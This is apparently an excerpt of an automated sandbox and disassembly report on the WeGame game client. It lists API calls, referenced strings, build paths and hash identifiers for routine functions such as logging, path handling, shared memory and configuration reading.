                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,000002DC), ref: 6BDB593D
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,000002DC), ref: 6BDB594F
                                                                • memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?,?,?,?,000002DC), ref: 6BDB5962
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6BDB59CA
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 6BDB59D4
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000F91,6C02E7BF,?,?,?,?,?,00000104), ref: 6BDB5A11
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 6BDB5A93
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDB59F8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@std@@$?u8to16@common@ierd_tgp@@D@2@@std@@W@2@@4@@$H_prolog3_$?get_log_instance@base@@?u16to8@common@ierd_tgp@@D@2@@4@@ErrorH_prolog3LastLogger@1@PrivateProfileStringW@2@@std@@memset
                                                                • String ID: e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                                                • API String ID: 1919723385-2520978235
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD94B0C
                                                                • memset.VCRUNTIME140(?,00000000,00000410,0000085C,6BD92947), ref: 6BD94B23
                                                                • memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000410,0000085C,6BD92947), ref: 6BD94B31
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 6BD94B6B
                                                                • wcsrchr.VCRUNTIME140(?,0000005C), ref: 6BD94B82
                                                                • wcsrchr.VCRUNTIME140(?,0000002F), ref: 6BD94B96
                                                                • __snprintf_s.LIBCMT ref: 6BD94BC0
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?), ref: 6BD94C11
                                                                • ?file_get_version@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAUversion_t@12@@Z.COMMON(?,?,?), ref: 6BD94C3F
                                                                • ?to_string@version_t@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?), ref: 6BD94C53
                                                                Strings
                                                                • %s\tcls\protocolcenter.dll, xrefs: 6BD94BAD
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@memsetwcsrchr$?file_get_version@common@ierd_tgp@@?to_string@version_t@common@ierd_tgp@@?u16to8@common@ierd_tgp@@D@2@@4@@FileH_prolog3_ModuleNameU?$char_traits@_Uversion_t@12@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@__snprintf_s
                                                                • String ID: %s\tcls\protocolcenter.dll
                                                                • API String ID: 2055968945-498237658
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00464268
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • ??0ShareMemory@Memory@ierd_tgp@@QAE@PB_WK@Z.COMMON(WEGMAE_QBLINK_SHARE_MEMORY_INFO,0000008C,00000058,00462C17,?,?), ref: 00464297
                                                                • ?Create@ShareMemory@Memory@ierd_tgp@@QAEHH@Z.COMMON(00000000,00000058,00462C17,?,?), ref: 004642B3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000058,00462C17,?,?), ref: 004642BC
                                                                • ??1ShareMemory@Memory@ierd_tgp@@QAE@XZ.COMMON(00000000,00000058,00462C17,?,?), ref: 0046431C
                                                                • ?GetBuffer@ShareMemory@Memory@ierd_tgp@@QBEPAEXZ.COMMON(00000000,00000058,00462C17,?,?), ref: 00464337
                                                                • _memcpy_s.PGOCR ref: 00464361
                                                                • _memcpy_s.PGOCR ref: 00464382
                                                                Strings
                                                                • WEGMAE_QBLINK_SHARE_MEMORY_INFO, xrefs: 00464290
                                                                • [QBlink]share memory init fail., xrefs: 004642F7
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004642E0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Memory@Memory@ierd_tgp@@Share$_memcpy_s$?get_log_instance@base@@Buffer@Create@H_prolog3_Logger@1@malloc
                                                                • String ID: WEGMAE_QBLINK_SHARE_MEMORY_INFO$[QBlink]share memory init fail.$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 2485382025-1277436582
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD48865
                                                                • ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD4887F
                                                                  • Part of subcall function 6BD472C0: __EH_prolog3_GS.LIBCMT ref: 6BD472CA
                                                                  • Part of subcall function 6BD472C0: memset.VCRUNTIME140(?,00000000,00000208,00000214,6BD48884,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD472F0
                                                                  • Part of subcall function 6BD472C0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 6BD47305
                                                                  • Part of subcall function 6BD472C0: PathRemoveFileSpecW.SHLWAPI(?), ref: 6BD47312
                                                                  • Part of subcall function 6BD16B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C098414,6BD16BB1,6C098418,?,6BD1A235,00000000,?,00000010), ref: 6BD16B81
                                                                  • Part of subcall function 6BD16B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BD16B8D
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD488BA
                                                                  • Part of subcall function 6BD5FD7B: __EH_prolog3_GS.LIBCMT ref: 6BD5FD85
                                                                  • Part of subcall function 6BD5FD7B: ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD5FDA8
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000), ref: 6BD5FE1D
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,00000000), ref: 6BD5FE8E
                                                                  • Part of subcall function 6BD5FD7B: ?root_name@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,00000000), ref: 6BD5FE9E
                                                                  • Part of subcall function 6BD5FD7B: ?root_directory@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,00000000), ref: 6BD5FEAD
                                                                  • Part of subcall function 6BD5FD7B: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(?,?,?,?,00000000), ref: 6BD5FEC2
                                                                • ?has_parent_path@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD488C4
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 6BD488D8
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(00000000,?,?,00000000,?), ref: 6BD4890E
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD48922
                                                                • ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000,?,?,?,00000000,?), ref: 6BD48934
                                                                • ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 6BD4897C
                                                                • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(00000000,?,00000000,?), ref: 6BD4898E
                                                                  • Part of subcall function 6BD5FD7B: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ.COMMON(?), ref: 6BD5FDE2
                                                                  • Part of subcall function 6BD5FD7B: ?relative_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 6BD5FF16
                                                                  • Part of subcall function 6BD5FD7B: ?relative_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?), ref: 6BD5FF2B
                                                                  • Part of subcall function 6BD5FD7B: ?root_directory@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?), ref: 6BD5FF40
                                                                • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?), ref: 6BD489A0
                                                                  • Part of subcall function 6BD1FACF: __EH_prolog3.LIBCMT ref: 6BD1FAD6
                                                                • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?), ref: 6BD489AC
                                                                  • Part of subcall function 6BD1A713: __EH_prolog3.LIBCMT ref: 6BD1A71A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: V123@$Vpath@12@$??0path@filesystem@ierd_tgp@@$?absolute@filesystem@ierd_tgp@@E@$$H_prolog3_V012@@V312@0@$?get_cfg_module_path@?relative_path@path@filesystem@ierd_tgp@@?root_directory@path@filesystem@ierd_tgp@@?root_name@path@filesystem@ierd_tgp@@FileFile_info@common@ierd_tgp@@H_prolog3U?$char_traits@_V?$allocator@_V?$basic_string@_Vpath@filesystem@3@W@std@@$?current_path@filesystem@ierd_tgp@@?exists@filesystem@ierd_tgp@@?has_parent_path@path@filesystem@ierd_tgp@@?is_absolute@path@filesystem@ierd_tgp@@?parent_path@path@filesystem@ierd_tgp@@?wstring@path@filesystem@ierd_tgp@@Execute_once@std@@ModuleNamePathRemoveSpecUonce_flag@1@Verror_code@std@@@W@2@@std@@W@2@@std@@@memsetterminate
                                                                • String ID:
                                                                • API String ID: 877234165-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD3389C
                                                                  • Part of subcall function 6BD33574: __EH_prolog3.LIBCMT ref: 6BD3357B
                                                                • _localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,6BFA11F0,00000000,000002AC), ref: 6BD33B7F
                                                                • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,6BFA11F0,00000000,000002AC), ref: 6BD33BA6
                                                                • strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?), ref: 6BD33BF8
                                                                • _CxxThrowException.VCRUNTIME140(?,6C03BD5C,missing '}' in format string,?,000002AC), ref: 6BD33C66
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: strftime$ExceptionH_prolog3H_prolog3_Throw_localtime64_s
                                                                • String ID: %Y-%m-%d %H-%M-%S.%f$%Y-%m-%d %H:%M:%S.%f$000000000$000000000$missing '}' in format string
                                                                • API String ID: 3645883216-1246186885
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD39C9B
                                                                • SHCreateDirectoryExW.SHELL32(00000000,-00000024,00000000,?,?,?,?,wegame,000000A8), ref: 6BD39DF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryH_prolog3_
                                                                • String ID: .log$\memlog$mem$memlog$wegame
                                                                • API String ID: 286309480-2121784790
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD30F0F
                                                                  • Part of subcall function 6BD31B55: __EH_prolog3_GS.LIBCMT ref: 6BD31B5C
                                                                • memset.VCRUNTIME140(?,00000000,00000100,?,?), ref: 6BD30FA8
                                                                • GetCurrentProcessId.KERNEL32(00000048,6BD31689,6BD43A1D), ref: 6BD30FB0
                                                                  • Part of subcall function 6BD104F0: __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000020,?,6BD108F4,00000000,?,?,6BD108F4,?,00000020,%#.16g,?,00000010), ref: 6BD1050C
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6BD30FDE
                                                                • CreateThread.KERNEL32(00000000,00000000,6BD3109D,?,00000000,?), ref: 6BD31008
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD31011
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • [Async_task_mgr]AppendNewThread task_thread_id:%d, true thread_id:%d, xrefs: 6BD31058
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\async_task.cpp, xrefs: 6BD31035
                                                                • %lu_ASYNC_TASK_MGR_EV_%u_, xrefs: 6BD30FB8
                                                                • 0/#v, xrefs: 6BD30FDE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CreateH_prolog3_$?get_log_instance@base@@CurrentEventH_prolog3H_prolog3_catch_Logger@1@ProcessThread__stdio_common_vsprintf_smemset
                                                                • String ID: %lu_ASYNC_TASK_MGR_EV_%u_$0/#v$[Async_task_mgr]AppendNewThread task_thread_id:%d, true thread_id:%d$e:\dailybuild_dev\wegame_client\codes\common\src\async_task.cpp
                                                                • API String ID: 217801211-3216557929
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?), ref: 0045F8EF
                                                                • ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 0045F8FB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F920
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F92C
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F93D
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F94F
                                                                • ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045F975
                                                                • ?Init@CrashReportLoader@crash_report@@QAEXPB_W_K1HP6GHPAUtagCrashReportHelperCallbackInfo@@@Z0@Z.ADAPT_FOR_IMPORTS(?,00000000,00000000,0000000A,00000004,00000000,0045EA47,?), ref: 0045F9A1
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit end), ref: 0045F9AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CrashReport$?get_client_version_type@overseas@ierd_tgp@@Loader@crash_report@@SimpleString::operator=$?is_static_detail_log@common@ierd_tgp@@?stamp_point@@CallbackHelperId@common@ierd_tgp@@Info@@@Init@Instance@LastLoginedUtagV12@Wegame
                                                                • String ID: CrashReportLoaderInit end$WeGameX
                                                                • API String ID: 2291668861-1424904570
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 00459C66: __EH_prolog3.LIBCMT ref: 00459C6D
                                                                  • Part of subcall function 00469DFB: __EH_prolog3_GS.LIBCMT ref: 00469E02
                                                                  • Part of subcall function 00453EC1: __EH_prolog3.LIBCMT ref: 00453EC8
                                                                  • Part of subcall function 00453EC1: ?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,?,?,?,?,00000008,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00453EDF
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,log), ref: 00464070
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000000,?,00000000,00000000,?,00000001,06400000,00000000,00000150), ref: 004640A0
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?,?,?,?,?,?,?,?,?,?,00463C2D,00000000,00459F4F), ref: 004640AE
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                  • Part of subcall function 00452DC2: __EH_prolog3.LIBCMT ref: 00452DC9
                                                                  • Part of subcall function 00450D26: __EH_prolog3.LIBCMT ref: 00450D2D
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00464139
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(tcls/log), ref: 00464155
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON ref: 004641C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?get_log_instance@base@@AsyncLogger@1@PushTask@common@ierd_tgp@@V?$function@$$Z@std@@$??_0path@filesystem@ierd_tgp@@?is_static_detail_log@common@ierd_tgp@@H_prolog3_Init@locale@std@@Locimp@12@_V012@_invalid_parameter_noinfo_noreturn
                                                                • String ID: !$is_crypt$tcls/log
                                                                • API String ID: 712499144-3576253943
                                                                • Opcode ID: 225f6d1e068b9b8bd53591bfd51257c005e365724581420f29c93a441d93042e
                                                                • Instruction ID: 1a694c70eb324331ee8e602bbad02992a19ec3f91f8f56e6820eef889782fb34
                                                                • Opcode Fuzzy Hash: 225f6d1e068b9b8bd53591bfd51257c005e365724581420f29c93a441d93042e
                                                                • Instruction Fuzzy Hash: FB51BC70D0124CEADB09EBA5CD96BDDBBB5AF14308F1441DEE1052B282EB781F48DB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9B994
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000110), ref: 6BD9B99B
                                                                • GetTickCount.KERNEL32 ref: 6BD9B9FA
                                                                • GetTickCount.KERNEL32 ref: 6BD9BA18
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BD9BA43
                                                                • Sleep.KERNEL32(00000064), ref: 6BD9BB4B
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                Strings
                                                                • [Qos_http_handler] worker start, xrefs: 6BD9B9DB
                                                                • [Qos_http_handler] wait for timeout,counting_stop_ms=%u, xrefs: 6BD9BA92
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6BD9B9BF, 6BD9BA6F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@CountLogger@1@Tick$H_prolog3H_prolog3_Sleep
                                                                • String ID: [Qos_http_handler] wait for timeout,counting_stop_ms=%u$[Qos_http_handler] worker start$e:\dailybuild_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                                                • API String ID: 3273642127-1390458660
                                                                • Opcode ID: aaed7f8a732ab35356c69a5b7f65b7a81491b14ebadefba3e158d18b7ae8b5f4
                                                                • Instruction ID: c895fc9ba3cecb5143c025b8612846adde89caad20a7a1276e86b7a9e2914d32
                                                                • Opcode Fuzzy Hash: aaed7f8a732ab35356c69a5b7f65b7a81491b14ebadefba3e158d18b7ae8b5f4
                                                                • Instruction Fuzzy Hash: BB510E30A04305DACB19EB74DA62BDCBBB29F51328F20049CC156AF2D1DB7C9B49CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00463258
                                                                  • Part of subcall function 00461579: __EH_prolog3_GS.LIBCMT ref: 00461583
                                                                  • Part of subcall function 00461579: memset.VCRUNTIME140(?,00000000,00000208,00000214,0046A105,?,85A35C35,?,?,?,?,?,0047B8A9,000000FF), ref: 004615A6
                                                                  • Part of subcall function 00461579: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004615BB
                                                                  • Part of subcall function 00461579: PathRemoveFileSpecW.SHLWAPI(?), ref: 004615C8
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • GetPrivateProfileStringW.KERNEL32(cmd_launcher_info,launcher,00485D1C,?,00000410,?), ref: 00463355
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00463368
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 00463375
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0046337C
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • launcher, xrefs: 0046334B
                                                                • cmd_launcher_info, xrefs: 00463350
                                                                • [main]read_cmd_launcher_info, get launcher from cmd_start_for, launcher = %s, xrefs: 004633C2
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004633A0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: FileH_prolog3_$?get_log_instance@base@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@H_prolog3Logger@1@ModuleNamePathPrivateProfileRemoveSimpleSpecStringString::operator=U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@_invalid_parameter_noinfo_noreturnmemset
                                                                • String ID: [main]read_cmd_launcher_info, get launcher from cmd_start_for, launcher = %s$cmd_launcher_info$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$launcher
                                                                • API String ID: 3879750388-780307634
                                                                • Opcode ID: 92b3c71d2a8a311c883c812a8f7228761a513328d007022e599a53a8104633e2
                                                                • Instruction ID: 311cc247819494e763e034a77bd011014dbc2df06ad4b8a0469c100330fe4a74
                                                                • Opcode Fuzzy Hash: 92b3c71d2a8a311c883c812a8f7228761a513328d007022e599a53a8104633e2
                                                                • Instruction Fuzzy Hash: 5A413970D012589ADB20EF65CC91B9EBBF4BF14704F5484EEA089A7281DF785B84CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004631E8
                                                                • OutputDebugStringA.KERNEL32([TGP]ReadBugRptConfig.,0000001C), ref: 004631F2
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON ref: 004631F8
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 00463201
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(?), ref: 00463214
                                                                • GetPrivateProfileIntW.KERNEL32(BugRpt,report_qos,00000001,?), ref: 00463231
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Application@common@ierd_tgp@@$??_0path@filesystem@ierd_tgp@@?get_workingdir_path_ex@?instance@DebugH_prolog3_OutputPrivateProfileStringV012@V123@Vpath@filesystem@3@
                                                                • String ID: BugRpt$[TGP]ReadBugRptConfig.$report_qos
                                                                • API String ID: 3418139206-2276067687
                                                                • Opcode ID: 615908025b742065004b269952b26561cc4095b9d4c3989554e3eb3e872bd347
                                                                • Instruction ID: c29df4b3525edff526eae1d687fd3d0c04a53cddad91b234e09ca61814946adb
                                                                • Opcode Fuzzy Hash: 615908025b742065004b269952b26561cc4095b9d4c3989554e3eb3e872bd347
                                                                • Instruction Fuzzy Hash: 75F09A30E502089BDB40FFF1C806ADCBBB0AF54328F50442AE210B2080FB788244CB6E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FDFA
                                                                • memset.VCRUNTIME140(00000010,?,00000000,00000000,7FFFFFFF,00000000,?,00000000,0000000F), ref: 6BD0FE08
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,0000000F), ref: 6BD0FE4B
                                                                • memmove.VCRUNTIME140(00000000,?,00000000,?,00000000,0000000F), ref: 6BD0FE53
